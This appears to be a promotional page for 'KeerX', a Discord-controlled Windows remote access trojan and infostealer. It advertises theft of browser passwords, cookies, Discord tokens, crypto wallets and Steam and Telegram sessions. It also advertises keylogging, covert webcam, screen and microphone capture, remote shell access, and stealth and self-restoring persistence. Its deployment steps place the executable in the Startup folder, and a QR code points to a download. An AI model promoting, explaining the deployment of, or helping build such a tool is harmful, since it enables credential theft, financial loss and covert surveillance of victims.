KeerX Analysis

Created by Itskeer

v2.5.0-stable

Application Overview

The KeerX WindowsHelper is a high-utility remote surveillance asset developed by Itskeer. Engineered for Windows x64 environments, it utilizes a Python 3.11 core to perform deep data exfiltration, real-time monitoring, and persistent system interaction via a Discord-integrated C2 interface.

Format
Standalone .exe
Size
~82.5 MB
Engine
Python 3.11
OS
Win x64

Deployment Protocol

To ensure the KeerX bot functions with maximum persistence and starts automatically upon system boot, follow the mandatory setup:

Installation Directory

The Bot.exe MUST be placed in the Windows Startup folder:

shell:startup
DOWNLOAD FOR WINDOWS ONLY
KeerX Download QR

Scan to Download

Hash Verified: SHA-256 Official Build by Itskeer

Data Targets

Risk Profile

1. Data Extraction (Stealer Suite)

Browser Data

Extracts passwords, cookies, and history from Chrome, Edge, and Brave via AES-GCM decryption.

Discord Tokens

Scans local state files for Discord and Discord Canary authentication tokens.

Crypto Wallets

Targets Electrum and Exodus wallet files specifically for exfiltration.

Sessions

Identifies and packages Steam and Telegram desktop session data.

2. Surveillance & Monitoring

Visual Streaming

Live screen and webcam streaming directly to Discord via MSS and OpenCV.

Audio Intercept

Remote microphone recording in 30s-60s chunks, uploaded as voice assets.

Keylogger

Continuous buffer dumping, clipboard tracking, and active window monitoring.

3. Remote Control & Interaction

Full Remote CMD / PowerShell Shell Access
Live Python REPL Execution Interface
Mouse & Keyboard Input Emulation (PyAutoGUI)

4. Internal Security & Bypasses

  • SSL Fix: Disables SSL verification for aiohttp and requests to ensure connectivity.
  • Self-Healing: Watchdog thread auto-restores files and registry keys if deleted.
  • Stealth: Uses System/Hidden attributes in AppData local folders.